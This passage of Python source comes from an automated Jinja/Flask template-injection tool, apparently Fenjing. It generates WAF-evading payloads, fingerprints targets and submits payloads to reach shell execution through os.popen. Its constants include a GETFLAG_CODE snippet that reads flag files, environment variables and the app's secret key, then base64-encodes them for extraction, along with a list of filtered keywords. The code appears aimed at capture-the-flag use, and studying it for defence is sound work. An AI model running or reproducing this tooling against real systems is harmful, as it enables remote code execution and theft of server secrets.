            isinstance(sub_target, tuple) for sub_target in target[2]
        ), repr(target)[:100]
        return self.generate_by_list(target[2])

    @register_generate_func(lambda self, target: target[0] == ENCLOSE_UNDER)
    def enclose_under_generate(
        self, target: EncloseUnderTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """为enclose_under的生成目标生成payload
        enclose_under中有其的优先级和target
        如果生成结果优先级更高则直接返回target的生成结果
        否则加上括号

        Args:
            target (EncloseUnderTarget): 生成目标

        Returns:
            Union[PayloadGeneratorResult, None]: 生成结果
        """
        assert isinstance(target[2], tuple), repr(target)
        result = self.generate_by_list([target[2]])
        if not result:
            return
        str_result, used_context, tree = result
        result_precedence = tree_precedence(tree)
        assert result_precedence is not None, str_result + repr(tree)
        should_enclose = (
            result_precedence <= target[1]
            if result_precedence == precedence["mod"]
            else result_precedence < target[1]
        )
        if should_enclose:
            logger.debug(
                (
                    "enclose_under_generate: result_precedence < "
                    + "target[1], result_precedence=%d, target[1]=%s"
                ),
                result_precedence,
                target[1],
            )
            ret = self.generate_by_list([(ENCLOSE, target[2])])
            return ret
        else:
            logger.debug(
                (
                    "enclose_under_generate: result_precedence >= "
                    + "target[1], result_precedence=%d, target[1]=%s"
                    + "target[2]=%s"
                ),
                result_precedence,
                target[1],
                pformat(target[2]),
            )
        return str_result, used_context, tree

    @register_generate_func(lambda self, target: target[0] == UNSATISFIED)
    def unsatisfied_generate(self, target: UnsatisfiedTarget) -> None:
        """直接拒绝类型为unsatisfied的生成目标"""
        return None

    @register_generate_func(lambda self, target: target[0] == ONEOF)
    def oneof_generate(
        self, target: OneofTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """生成类型为oneof的生成目标，遍历其中的每一个子目标并选择其中一个生成

        Args:
            target (OneofTarget): oneof生成目标，其中有多个生成目标列表

        Returns:
            Union[PayloadGeneratorResult, None]: 生成结果
        """
        _, alternative_targets = target
        for req in alternative_targets:
            ret = self.generate_by_list(req)
            if ret is not None:
                return ret
        return None

    @register_generate_func(lambda self, target: target[0] == WITH_CONTEXT_VAR)
    def with_context_var_generate(
        self, target: WithContextVarTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """生成类型为with_context_var的生成目标，将其中包含的变量名加入到已经使用的变量中

        Args:
            target (WithContextVarTarget): 生成目标

        Returns:
            _type_: 生成结果
        """
        return ("", {target[1]: self.context[target[1]]}, [])

    @register_generate_func(lambda self, target: target[0] == JINJA_CONTEXT_VAR)
    def jinja_context_var_generate(
        self, target: JinjaContextVarTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """生成类型为jinja_context_var_generate的生成目标，将其中包含的变量名加入到已经使用的变量中

        Args:
            target (JinjaContextVarTarget): 生成目标

        Returns:
            _type_: 生成结果
        """
        return (target[1], {}, [])

    @register_generate_func(lambda self, target: target[0] == FLASK_CONTEXT_VAR)
    def flask_context_var_generate(
        self, target: FlaskContextVarTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """生成类型为flask_context_var_generate的生成目标，将其中包含的变量名加入到已经使用的变量中

        Args:
            target (FlaskContextVarTarget): 生成目标

        Returns:
            _type_: 生成结果
        """
        if self.options.environment != TemplateEnvironment.FLASK:
            return None
        return (target[1], {}, [])

    @register_generate_func(lambda self, target: target[0] == REQUIRE_PYTHON3)
    def require_python3_generate(
        self, target: RequirePython3Target
    ) -> Union[PayloadGeneratorResult, None]:
        """生成类型为flask_context_var_generate的生成目标，将其中包含的变量名加入到已经使用的变量中

        Args:
            target (RequirePython3Target): 生成目标

        Returns:
            _type_: 生成结果
        """
        if self.options.python_version != PythonVersion.PYTHON3:
            return None
        return ("", {}, [])

    @register_generate_func(
        lambda self, target: target[0] == REQUIRE_PYTHON3_SUBVERSION
    )
    def require_python3_subversion_generate(
        self, target: RequirePython3SubversionTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """生成类型为flask_context_var_generate的生成目标，将其中包含的变量名加入到已经使用的变量中

        Args:
            target (RequirePython3SubversionTarget): 生成目标

        Returns:
            _type_: 生成结果
        """
        if (
            self.options.python_version != PythonVersion.PYTHON3
            or self.options.python_subversion is None
            or self.options.python_subversion < target[1]
        ):
            return None
        return ("", {}, [])

    @register_generate_func(lambda self, target: target[0] == REQUIRE_FLASK)
    def require_flask_generate(
        self, target: RequireFlaskTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """生成类型为flask_context_var_generate的生成目标，将其中包含的变量名加入到已经使用的变量中

        Args:
            target (RequireFlaskTarget): 生成目标

        Returns:
            _type_: 生成结果
        """
        if self.options.environment != TemplateEnvironment.FLASK:
            return None
        return ("", {}, [])

    @register_generate_func(lambda self, target: target[0] == VARIABLE_OF)
    def variable_of_generate(
        self, target: VariableOfTarget
    ) -> Union[PayloadGeneratorResult, None]:
        """在context中找到对应的变量

        Args:
            target (VariableOfTarget): 生成目标

        Returns:
            _type_: 生成结果
        """
        expressions = [
            (expr, precedence_index)
            for expr, (value, precedence_index) in self.context.items()
            if value == target[1]
        ]
        if not expressions:
            return self.generate_by_list([(UNSATISFIED,)])
        targets_list: List[List[Target]] = [
            [
                (
                    EXPRESSION,
                    precedence_index,
                    [(LITERAL, expr), (WITH_CONTEXT_VAR, expr)],
                )
            ]
            for expr, precedence_index in expressions
        ]
        return self.generate_by_list([(ONEOF, targets_list)])

    @register_generate_func(lambda self, target: True)
    def common_generate(self, gen_req: Target) -> Union[PayloadGeneratorResult, None]:
        """为剩下所有类型的生成目标生成对应的payload, 遍历对应的expression_gen，拿到
        对应的生成目标列表并尝试使用这个列表生成payload

        Args:
            gen_req (Target): 生成目标

        Returns:
            Union[PayloadGeneratorResult, None]: 生成结果
        """
        gen_type, *args = gen_req
        if gen_type not in expression_gens or len(expression_gens[gen_type]) == 0:
            raise RuntimeError(f"Unknown type: {gen_type}")

        gens = expression_gens[gen_type].copy()
        if self.options.detect_mode == DetectMode.FAST:
            gens.sort(key=lambda gen: self.used_count[gen.__name__], reverse=True)
        with optional_context(
            gen_type
            in [
                STRING,
                POSITIVE_INTEGER,
                ZERO,
                OS_POPEN_READ,
                EVAL,
            ],
            gens,
            lambda gens: pbar_manager.pbar(gens, "Rule"),
        ) as gens:
            for gen in gens:
                logger.debug("Trying gen rule: %s", gen.__name__)
                if isinstance(gens, Pbar):
                    gens.update(description="Rule: " + gen.__name__)
                gen_ret: List[Target] = gen(self.context, *args)
                try:
                    ret = self.generate_by_list(gen_ret)
                except Exception as e:
                    raise RuntimeError(f"Unknown error at {gen.__name__}") from e
                if ret is None:
                    continue
                logger.debug("Using gen rule: %s", gen.__name__)
                result = ret[0]
                self.callback(
                    CALLBACK_GENERATE_PAYLOAD,
                    {
                        "gen_type": gen_type,
                        "args": args,
                        "gen_ret": gen_ret,
                        "payload": result,
                    },
                )
                # 为了日志的简洁，仅打印一部分日志
                if (
                    gen_type in (POSITIVE_INTEGER, STRING) and result != str(args[0])
                ) or (gen_type == ZERO and result != "0"):
                    logger.info(
                        "[green bold]Great![/] [green bold]{gen_name}[/] says "
                        "[yellow bold]{gen_type}[/]"
                        "[yellow]({args_repl})[/] can be [blue]{result}[/]".format(
                            gen_type=gen_type,
                            gen_name=rich_escape(gen.__name__),
                            args_repl=rich_escape(", ".join(repr(arg) for arg in args)),
                            result=rich_escape(result),
                        ),
                        extra={"markup": True, "highlighter": None},
                    )

                elif gen_type in (
                    EVAL_FUNC,
                    EVAL,
                    CONFIG,
                    MODULE_OS,
                    OS_POPEN_OBJ,
                    OS_POPEN_READ,
                ):
                    logger.info(
                        "[green bold]Great![/green bold] we generate "
                        "[yellow bold]{gen_type}[/yellow bold]"
                        "[yellow]({args_repl})[/yellow]".format(
                            gen_type=gen_type,
                            args_repl=rich_escape(", ".join(repr(arg) for arg in args)),
                        ),
                        extra={"markup": True, "highlighter": None},
                    )

                self.cache_by_repr[gen_req] = ret
                self.used_count[gen.__name__] += 1
                return ret
        if gen_type not in (
            CHAINED_ATTRIBUTE_ITEM,
            ATTRIBUTE,
            ITEM,
            PLUS,
            MULTIPLY,
            STRING_CONCAT,
            MOD,
            STRING_CONCATMANY,
            ENCLOSE,
            ENCLOSE_UNDER,
            STRING_CONCAT,
            WRAP,
            FUNCTION_CALL,
        ):
            logger.info(
                "[red]Failed[/red] generating [yellow bold]{gen_type}[/yellow bold][yellow]({args_repl})[/yellow]. "
                "Hopefully it might not be an issue.".format(
                    gen_type=gen_type,
                    args_repl=rich_escape(", ".join(repr(arg) for arg in args)),
                ),
                extra={"markup": True, "highlighter": None},
            )

        self.cache_by_repr[gen_req] = None
        return None

    def generate(self, gen_type, *args) -> Union[str, None]:
        """提供给用户的生成接口，接收一个生成目标的类型和参数

        Args:
            gen_type (str): 生成目标的类型
            *args: 生成目标的参数

        Returns:
            Union[str, None]: 生成结果
        """
        result = self.generate_by_list([(gen_type, *args)])
        if result is None:
            return None
        s, _, _ = result
        return s

    def generate_detailed(self, gen_type, *args) -> Union[PayloadGeneratorResult, None]:
        """提供给用户的生成接口，接收一个生成目标的类型和参数

        Args:
            gen_type (str): 生成目标的类型
            *args: 生成目标的参数

        Returns:
            Union[PayloadGeneratorResult, None]: 生成结果（包含使用的上下文变量）
        """
        result = self.generate_by_list([(gen_type, *args)])
        if result is None:
            return None
        return result

    def delete_from_cache(self, gen_type, *args):
        if (gen_type, *args) in self.cache_by_repr:
            del self.cache_by_repr[(gen_type, *args)]



"""所有常用常数"""

from typing import Callable
from enum import Enum
from pathlib import Path

CURRENT_FOLDER = Path(__file__).parent

DEFAULT_USER_AGENT = "Fenjing/0.1"

# 支持的生成类型

# 字面量
LITERAL = "literal"
# 生成失败
UNSATISFIED = "unsatisfied"
# 带有优先级标记的表达式
EXPRESSION = "expression"
# 选择后方的其中一条生成目标进行生成
ONEOF = "oneof"
# 当优先级小于n时对生成结果加上括号
ENCLOSE_UNDER = "enclose_under"
# 强制加上括号（包裹）
ENCLOSE = "enclose"
# 单纯地加上括号，用于函数调用等
WRAP = "wrap"
# 标记使用了某个上下文中的变量
WITH_CONTEXT_VAR = "with_context_var"
# 事先提供的表达式
GENERATED_EXPR = "generated_expr"
# jinja上下文内置的变量
JINJA_CONTEXT_VAR = "jinja_context_var"
# flask上下文内置的变量
FLASK_CONTEXT_VAR = "flask_context_var"
# 需要python3环境
REQUIRE_PYTHON3 = "require_python3"
# 需要python3小版本至少为
REQUIRE_PYTHON3_SUBVERSION = "require_python3_subversion"
# 需要flask环境
REQUIRE_FLASK = "require_flask"

PLUS = "plus"
MULTIPLY = "multiply"
MOD = "mod"
FUNCTION_CALL = "function_call"
STRING_CONCAT = "string_concat"
STRING_CONCATMANY = "string_concatmany"
LISTIFY = "listify"  # 将对象放入list中
MAP_ATTR = "map_attr"

VARIABLE_OF = "variable_of"
WHITESPACE = "whitespace"
ZERO = "zero"
POSITIVE_INTEGER = "positive_integer"
INTEGER = "integer"
STRING_PERCENT = "string_percent"
STRING_PERCENT_LOWER_C = "string_percent_lower_c"
STRING_UNDERLINE = "string_underline"
STRING_TWOUNDERLINE = "string_twounderline"
STRING_LOWERC = "string_lower_c"
STRING_MANY_PERCENT_LOWER_C = "string_many_percent_lower_c"
STRING_MANY_FORMAT_C = "string_many_format_c"
CHAR = "char"
STRING = "string"
FORMULAR_SUM = "formular_sum"
ATTRIBUTE = "attribute"
ITEM = "item"
CLASS_ATTRIBUTE = "class_attribute"
CHAINED_ATTRIBUTE_ITEM = "chained_attribute_item"
BUILTINS_DICT = "builtins_dict"
IMPORT_FUNC = "import_func"
EVAL_FUNC = "eval_func"
EVAL = "eval"
CONFIG = "config"
MODULE_OS = "module_os"
OS_POPEN_OBJ = "os_popen_obj"
OS_POPEN_READ = "os_popen_read"

# callback函数的参数

CALLBACK_PREPARE_FULLPAYLOADGEN = "prepare_fullpayloadgen"
CALLBACK_GENERATE_FULLPAYLOAD = "generate_full_payload"
CALLBACK_GENERATE_PAYLOAD = "payload_gen"
CALLBACK_SUBMIT = "submit"
CALLBACK_TEST_FORM_INPUT = "test_form_input"

# WEBUI的接口返回值

APICODE_OK = 200
APICODE_WRONG_INPUT = 401


class DetectMode(Enum):
    """程序检测的目标模式：快速或精确"""

    FAST = "fast"
    ACCURATE = "accurate"


class TemplateEnvironment(Enum):
    """模板的执行环境：flask或者普通的Jinja"""

    FLASK = "flask"
    JINJA2 = "jinja2"


class PythonVersion(Enum):
    """模板的python执行环境：手动指定python3或者python2，或者让脚本猜测"""

    UNKNOWN = "unknown"
    PYTHON2 = "python2"
    PYTHON3 = "python3"


class ReplacedKeywordStrategy(Enum):
    """在WAF替换危险keywords时的策略"""

    AVOID = "avoid"
    IGNORE = "ignore"
    DOUBLETAPPING = "doubletapping"


class AutoFix500Code(Enum):
    """是否开启自动修复500响应码"""

    ENABLED = "enabled"
    DISABLED = "disabled"


class DetectWafKeywords(Enum):
    """是否检测被waf的关键字"""

    FULL = "full"
    FAST = "fast"
    NONE = "none"


class FindFlag(Enum):
    """自动获取flag"""

    AUTO = "auto"
    ENABLED = "enabled"
    DISABLED = "disabled"


WafFunc = Callable[[str], bool]

WHITESPACES = [
    " ",
    "\t",
    "\n",
    "\r",
    "\x1c",
    "\x1d",
    "\x1e",
    "\x1f",
]

SET_STMT_PATTERNS = [
    (
        "{%set NAME=EXPR%}".replace(" ", ws),
        "{%set =%}".replace(" ", ws),
        "NAME",
        "literal",
    )
    for ws in WHITESPACES
] + [
    ("{%set(NAME)=EXPR%}", "{%set(a)=%}", "NAME", "literal"),
    (
        "{{config.update(NAME=EXPR)}}",
        "{{config.update(=)}}",
        "config.NAME",
        "attribute",
    ),
]

WHITESPACES_AND_EMPTY = [""] + WHITESPACES

DANGEROUS_KEYWORDS = [
    '"',
    "%",
    "'",
    "))",
    "),)",
    "*",
    "+",
    "-",
    ".",
    "/",
    "0",
    '0"',
    "1",
    "2",
    "3",
    "37",
    "4",
    "5",
    "6",
    "7",
    "8",
    "9",
    ":",
    ";",
    "=",
    "[",
    "\\",
    "\\u",
    "\\x",
    "]",
    "_",
    "__",
    "app",
    "arg",
    "attr",
    "base",
    "batch",
    "builtin",
    "builtins",
    "cat",
    "cd",
    "chr",
    "class",
    "compile",
    "config",
    "count",
    "cycler",
    "dict",
    "echo",
    "env",
    "escape",
    "eval",
    "exec",
    "execfile",
    "f3n",
    "file",
    "flag",
    "flashed",
    "for",
    "format",
    "from_pyfile",
    "func_globals",
    "get_flashed_messages",
    "getattr",
    "getattribute",
    "getitem",
    "global",
    "globals",
    "if",
    "import",
    "include",
    "index",
    "init",
    "item",
    "j1ng",
    "join",
    "joiner",
    "length",
    "lipsum",
    "local",
    "mro",
    "namespace",
    "not",
    "open",
    "ord",
    "os",
    "pop",
    "popen",
    "posix",
    "range",
    "read",
    "replace",
    "request",
    "reverse",
    "self",
    "subclasses",
    "subprocess",
    "system",
    "url",
    "url_for",
    "value",
    "{{",
    "{{}}",
    "{%",
    "%}",
    "{%%}",
    "|",
    "}}",
    "~",
]

# all targets needed by rules using GENERATED_EXPR
EXTRA_TARGETS = [
    (STRING, "attr"),
    (STRING, "to_bytes"),
    (STRING, "decode"),
    (STRING, "attribute"),
    (STRING, "__add__"),
    (STRING, "__globals__"),
    (STRING, "__builtins__"),
    (STRING, "__getitem__"),
    (STRING, "eval"),
    (STRING, "bytes"),
    (STRING, "big"),
]

RENDER_ERROR_KEYWORDS = [
    "TemplateSyntaxError",
    "Internal Server Error",
    "Traceback (most recent call last):",
]

BRAINROT_VARNAMES = [
    "_233",
    "_114",
    "_1919",
    "QAQ",
    "QwQ",
    "OvO",
    "ez",
    "sbwaf",
    "sb",
]

GETFLAG_CODE = """
def f():
    try:
        import os,pathlib,base64,re
        app=getattr(__import__("__main__"),"app",os)
        data = {
"env": os.environ,
"files": os.popen("cat /f* ./f*;/readflag").read(),
"config": [getattr(app,a,None) for a in ["config","secret_key"]],
}
        return "start"+base64.b64encode(repr(data).encode()).decode()+"stop"
    except Exception:
        import traceback
        return traceback.format_exc()
""".replace(
    "    ", " "
)

GETFLAG_CODE_EVAL = f"[exec({GETFLAG_CODE!r}),f()][-1]"

# charcodes that not supported by python3.2 are removed.
UNICODE_INT_CHARCODES = [
    [1632, 1633, 1634, 1635, 1636, 1637, 1638, 1639, 1640, 1641],
    [1776, 1777, 1778, 1779, 1780, 1781, 1782, 1783, 1784, 1785],
    [1984, 1985, 1986, 1987, 1988, 1989, 1990, 1991, 1992, 1993],
    [2406, 2407, 2408, 2409, 2410, 2411, 2412, 2413, 2414, 2415],
    [2534, 2535, 2536, 2537, 2538, 2539, 2540, 2541, 2542, 2543],
    [2662, 2663, 2664, 2665, 2666, 2667, 2668, 2669, 2670, 2671],
    [2790, 2791, 2792, 2793, 2794, 2795, 2796, 2797, 2798, 2799],
    [2918, 2919, 2920, 2921, 2922, 2923, 2924, 2925, 2926, 2927],
    [3046, 3047, 3048, 3049, 3050, 3051, 3052, 3053, 3054, 3055],
    [3174, 3175, 3176, 3177, 3178, 3179, 3180, 3181, 3182, 3183],
    [3302, 3303, 3304, 3305, 3306, 3307, 3308, 3309, 3310, 3311],
    [3430, 3431, 3432, 3433, 3434, 3435, 3436, 3437, 3438, 3439],
    # [3558, 3559, 3560, 3561, 3562, 3563, 3564, 3565, 3566, 3567],
    [3664, 3665, 3666, 3667, 3668, 3669, 3670, 3671, 3672, 3673],
    [3792, 3793, 3794, 3795, 3796, 3797, 3798, 3799, 3800, 3801],
    [3872, 3873, 3874, 3875, 3876, 3877, 3878, 3879, 3880, 3881],
    [4160, 4161, 4162, 4163, 4164, 4165, 4166, 4167, 4168, 4169],
    [4240, 4241, 4242, 4243, 4244, 4245, 4246, 4247, 4248, 4249],
    [6112, 6113, 6114, 6115, 6116, 6117, 6118, 6119, 6120, 6121],
    [6160, 6161, 6162, 6163, 6164, 6165, 6166, 6167, 6168, 6169],
    [6470, 6471, 6472, 6473, 6474, 6475, 6476, 6477, 6478, 6479],
    [6608, 6609, 6610, 6611, 6612, 6613, 6614, 6615, 6616, 6617],
    [6784, 6785, 6786, 6787, 6788, 6789, 6790, 6791, 6792, 6793],
    [6800, 6801, 6802, 6803, 6804, 6805, 6806, 6807, 6808, 6809],
    [6992, 6993, 6994, 6995, 6996, 6997, 6998, 6999, 7000, 7001],
    [7088, 7089, 7090, 7091, 7092, 7093, 7094, 7095, 7096, 7097],
    [7232, 7233, 7234, 7235, 7236, 7237, 7238, 7239, 7240, 7241],
    [7248, 7249, 7250, 7251, 7252, 7253, 7254, 7255, 7256, 7257],
    [42528, 42529, 42530, 42531, 42532, 42533, 42534, 42535, 42536, 42537],
    [43216, 43217, 43218, 43219, 43220, 43221, 43222, 43223, 43224, 43225],
    [43264, 43265, 43266, 43267, 43268, 43269, 43270, 43271, 43272, 43273],
    [43472, 43473, 43474, 43475, 43476, 43477, 43478, 43479, 43480, 43481],
    # [43504, 43505, 43506, 43507, 43508, 43509, 43510, 43511, 43512, 43513],
    [43600, 43601, 43602, 43603, 43604, 43605, 43606, 43607, 43608, 43609],
    [44016, 44017, 44018, 44019, 44020, 44021, 44022, 44023, 44024, 44025],
    [65296, 65297, 65298, 65299, 65300, 65301, 65302, 65303, 65304, 65305],
]



"""攻击指定的路径"""

import functools
import logging
import random
import re
import sys
import string
import time

from collections import namedtuple
from string import ascii_lowercase

from rich.markup import escape as rich_escape

from .rules_types import TargetAndSubTargets
from .rules_utils import find_bad_exprs, tree_precedence
from .requester import HTTPRequester
from .form import random_fill
from .submitter import (
    FormSubmitter,
    RequestSubmitter,
    Submitter,
    ExtraParamAndDataCustomizable,
)
from .pbar import pbar_manager
from .const import (
    PythonVersion,
    AutoFix500Code,
    ATTRIBUTE,
    ITEM,
    CHAINED_ATTRIBUTE_ITEM,
    STRING,
    CONFIG,
    EVAL,
    OS_POPEN_READ,
    FLASK_CONTEXT_VAR,
)
from .waf_func_gen import WafFuncGen, KeywordWafFuncGen, WafFunc
from .full_payload_gen import FullPayloadGen
from .context_vars import ContextVariableManager
from .options import Options


if sys.version_info >= (3, 8):
    from typing import Union, Callable, Dict, Tuple, List
else:
    from typing_extensions import Union, Callable, Dict, Tuple, Literal, List
logger = logging.getLogger("cracker")
Result = namedtuple("Result", "full_payload_gen input_field")


def guess_python_version(
    url: str, requester: HTTPRequester
) -> Tuple[PythonVersion, Union[int, None]]:
    """猜测目标的python版本

    Args:
        url (str): 目标的url
        requester (Requester): 用于发送请求的requester

    Returns:
        PythonEnvironment: python版本
    """
    resp = requester.request(method="GET", url=url)
    if resp is None:
        return PythonVersion.UNKNOWN, None
    header = resp.headers.get("Server", "")
    version_regexp = re.search(r"Python/(\d)(\.?\d+)?", header)
    if not version_regexp:
        return PythonVersion.UNKNOWN, None
    version, subversion = (
        (
            PythonVersion.PYTHON3,
            (int(version_regexp.group(2)[1:]) if version_regexp.group(2) else None),
        )
        if version_regexp.group(1) == "3"
        else (PythonVersion.PYTHON2, None)
    )
    logger.info(
        "Target is [blue bold]%s.%s[/]",
        version.value,
        str(subversion) if subversion else "x",
        extra={"markup": True, "highlighter": None},
    )
    return version, subversion


def guess_is_flask(submitter: Submitter):
    payloads = [
        (pattern.replace("VAR", var), text)
        for var, text in [
            ("g", "flask.g"),
            ("request", "Request "),
            ("session", "Session "),
        ]
        for pattern in [
            "{{VAR}}",
            "{%print VAR%}",
            "{%print(VAR)%}",
            "{%print\nVAR%}",
            "{%print\tVAR%}",
            "{%print\rVAR%}",
        ]
    ]
    with pbar_manager.pbar(payloads, "guess_template_environment") as payloads:
        for payload, text in payloads:
            result = submitter.submit(payload)
            if result is None or text not in result.text:
                continue
            logger.info(
                "It might be [cyan bold]flask[/] because "
                "we see [blue]%s[/] in [yellow]%s[/]",
                rich_escape(repr(text)),
                rich_escape(repr(payload)),
                extra={"markup": True, "highlighter": None},
            )
            return True
    return False


class EvalArgsModePayloadGen:
    """在EvalArgs模式下的payload生成器"""

    def __init__(self, will_print):
        self.will_print = will_print

    def generate(self, gen_type, *args):
        """生成EvalArgs模式下的payload"""
        if gen_type == OS_POPEN_READ:
            return f"__import__('os').popen({repr(args[0])}).read()", self.will_print
        elif gen_type == EVAL:
            req = args[0]
            if req[0] == STRING:
                return f"eval({req[1]!r})", self.will_print
            elif (
                req[0] == ITEM
                and req[0][1][0] == ATTRIBUTE
                and req[0][1][1] == "values"
                and req[0][1][0][1][0] == FLASK_CONTEXT_VAR
                and req[0][1][0][1][1] == "request"
            ):
                # i wish i can use `match`
                # its something like request.values.xxx
                key = req[1]
                return f"eval(request.values.{key})", self.will_print
            else:
                assert False, f"Unsupported payload {req=}"
        elif gen_type == CONFIG:
            return (
                "[v.config for v in sys.modules['__main__'].__dict__.values()"
                + " if isinstance(v, sys.modules['flask'].Flask)][0]",
                self.will_print,
            )
        return None, None


class Cracker:
    """
    针对某个网站进行攻击
    """

    test_cmd = "echo f3n  j1ng;"
    test_eval = "'f'+str(3)+'n j'+str(1)+\"ng\""
    test_result = "f3n j1ng"

    def __init__(
        self,
        submitter: Submitter,
        callback: Union[Callable[[str, Dict], None], None] = None,
        options: Union[Options, None] = None,
    ):
        self.options = options if options else Options()
        self.subm = submitter

        self._callback: Callable[[str, Dict], None] = (
            callback if callback else (lambda x, y: None)
        )
        self.waf_func_gen = (
            KeywordWafFuncGen(
                submitter, self.options.waf_keywords, callback=callback, options=options
            )
            if self.options.waf_keywords
            else WafFuncGen(submitter, callback=callback, options=options)
        )

    @property
    def callback(self):
        """Callback函数

        Returns:
            Callable: Callback函数
        """
        return self._callback

    @callback.setter
    def callback(self, callback):
        self._callback = callback
        self.waf_func_gen.callback = callback

    def test_payload(self, payload: str, will_print: bool) -> str:
        """测试某个执行shell指令的payload是否会产生回显

        Args:
            payload (str): 用于测试的payload
            will_print (bool): payload是否会产生回显

        Returns:
            str: 测试结果
        """
        logger.info(
            "Testing generated payload.",
            extra={"highlighter": None},
        )
        result = self.subm.submit(payload)
        assert result is not None
        status_code, text = result
        if status_code == 500:
            return "FAIL_500"
        return (
            "SUCCESS" if self.test_result in text or not will_print else "FAIL_UNKNOWN"
        )

    def test_payload_eval_args(self, payload: str, subm: Submitter) -> bool:
        """测试某个进行eval的payload是否会产生回显

        Args:
            payload (str): 用于测试的payload
            subm (Submitter):
                用于提交payload的submitter, 可能和self中的submitter不同

        Returns:
            bool: 是否产生回显
        """
        logger.info(
            "Testing generated payload as eval args.",
            extra={"highlighter": None},
        )
        result = subm.submit(payload)
        assert result is not None
        _, text = result
        return self.test_result in text

    def has_respond(self) -> bool:
        """测试对应的submitter是否会产生回显（显示我们提交的数据）

        Returns:
            bool: 是否产生回显
        """
        for _ in range(10):
            content = random.choice(ascii_lowercase) * 6
            resp = self.subm.submit(content)
            assert resp is not None, "HTTP Failed"
            if content in resp.text:
                return True
        return False

    def add_request_args(
        self,
        full_payload_gen: FullPayloadGen,
        waf: WafFunc,
        extra_values: Union[List[str], None] = None,
    ):
        if not isinstance(self.subm, ExtraParamAndDataCustomizable):
            return
        values = ["_", "__", "%", "%c"]
        if extra_values:
            values += extra_values
        used_name = set()
        assert (
            full_payload_gen.payload_gen is not None
        ), "you need to run full_payload_gen.do_prepare()"
        with pbar_manager.pbar(values, "add_request_args") as values:
            for value in values:
                name = "".join(random.choices(string.ascii_lowercase, k=2))
                while name in used_name and waf(name):
                    name = "".join(random.choices(string.ascii_lowercase, k=2))
                target = (
                    ITEM,
                    (ATTRIBUTE, (FLASK_CONTEXT_VAR, "request"), "args"),
                    name,
                )
                result = full_payload_gen.payload_gen.generate_detailed(*target)
                if result is None:
                    logger.warning(
                        "Failed generating [yellow]request.args.%s[/], continue...",
                        rich_escape(name),
                        extra={"markup": True, "highlighter": None},
                    )
                    continue
                payload, context_vars, tree = result
                if context_vars != {}:
                    # if it need other variables to works
                    # like request[var1][var2]
                    # we just skip it bacause its too complex
                    logger.warning(
                        "[blue]%s[/]depends on too many variables, continue",
                        rich_escape(payload),
                        extra={"markup": True, "highlighter": None},
                    )
                    continue

                value_payload = full_payload_gen.payload_gen.generate(STRING, value)
                if value_payload is not None and len(value_payload) < len(payload):
                    # We skip it if the payload of the value is shorter than
                    # the payload for request.args.xxx
                    logger.warning(
                        "[blue]%s[/]depends is too long, continue",
                        rich_escape(payload),
                        extra={"markup": True, "highlighter": None},
                    )
                    continue

                precedence_index = tree_precedence(tree)
                assert (
                    precedence_index is not None
                ), f"failed to calculate precedence for {payload=}"
                logger.info(
                    "Adding [blue]%s=[/][yellow bold]%s[/]",
                    rich_escape(payload),
                    rich_escape(repr(value)),
                    extra={"markup": True, "highlighter": None},
                )
                self.subm.set_extra_param(name, value)
                full_payload_gen.add_request_args(payload, value, precedence_index)

    def crack_with_waf(
        self, waf_func: WafFunc, waf_expr_func=None
    ) -> Union[Tuple[FullPayloadGen, bool, str, TargetAndSubTargets], None]:
        """实际进行Crack的函数

        Returns:
            Union[Tuple[FullPayloadGen, bool, str, TargetAndSubTargets], None]:
                攻击结果
        """
        full_payload_gen = FullPayloadGen(
            waf_func,
            callback=None,
            options=self.options,
            waf_expr_func=waf_expr_func,
        )
        full_payload_gen.do_prepare()
        assert full_payload_gen.payload_gen is not None
        self.add_request_args(full_payload_gen, waf=waf_func)
        full_payload_gen.payload_gen.cache_by_repr.clear()
        result = full_payload_gen.generate_with_tree(OS_POPEN_READ, self.test_cmd)
        if result is None:
            return None
        payload, will_print, tree = result
        test_result = self.test_payload(payload, will_print)
        return full_payload_gen, will_print, test_result, tree

    def log_with_result(self, will_print: bool, test_result: str):
        """根据攻击结果打印log

        Args:
            will_print (bool): payload是否会产生回显
            test_result (str): 攻击结果
        """
        if will_print:
            if test_result == "SUCCESS":
                logger.info(
                    "[cyan bold]Success![/] Now we can generate payloads.",
                    extra={"markup": True, "highlighter": None},
                )
            elif test_result == "FAIL_UNKNOWN":
                logger.info(
                    "[yellow bold]Test Payload Failed[/] Generated payloads might be useless.",
                    extra={"markup": True, "highlighter": None},
                )
            else:  # test_result == "FAIL_500"
                logger.info(
                    "Target return status code [yellow bold]500[/]!",
                    extra={"markup": True, "highlighter": None},
                )
        else:
            if test_result == "FAIL_500":
                logger.info(
                    "Target return status code [yellow bold]500[/]! "
                    "(although payload won't print anything)",
                    extra={"markup": True, "highlighter": None},
                )
            else:
                logger.info(
                    "We WON'T SEE the execution result! "
                    + "You can try generating payloads anyway.",
                    extra={"markup": True, "highlighter": None},
                )

    def expr_waf_not500(
        self, tree, outer_pattern, context_vars: ContextVariableManager
    ):
        def is_expr_bad(expr):
            payload = "".join(
                [
                    *context_vars.get_payload(context_vars.get_context()),
                    outer_pattern.replace("PAYLOAD", expr),
                ]
            )
            result = self.subm.submit(payload)
            assert result is not None
            status_code, _ = result
            logger.info(
                "payload [blue]%s[/] generate status code [yellow]%d[/]",
                rich_escape(payload),
                status_code,
                extra={"markup": True, "highlighter": None},
            )
            return status_code == 500

        exprs = [payload for payload, _ in find_bad_exprs(tree, is_expr_bad)]

        @functools.lru_cache(500)
        def new_waf(s):
            return all(expr not in s for expr in exprs) and not is_expr_bad(s)

        return new_waf

    def crack(self) -> Union[FullPayloadGen, None]:
        """开始进行攻击，生成一个执行shell命令的payload，测试并返回payload生成器

        Returns:
            Union[FullPayloadGen, None]: 生成器
        """
        logger.info("Cracking...", extra={"highlighter": None})
        waf_func = self.waf_func_gen.generate()
        result = self.crack_with_waf(waf_func)
        if not result:
            return None
        full_payload_gen, will_print, test_result, tree = result
        assert (
            full_payload_gen.context_vars is not None
        ), "when generated successfully, this should not be none"
        self.log_with_result(will_print, test_result)
        if (
            test_result == "FAIL_500"
            and self.options.autofix_500 == AutoFix500Code.ENABLED
        ):
            logger.warning(
                "[yellow bold]Start fixing status code 500.[/]",
                extra={"markup": True, "highlighter": None},
            )
            logger.warning(
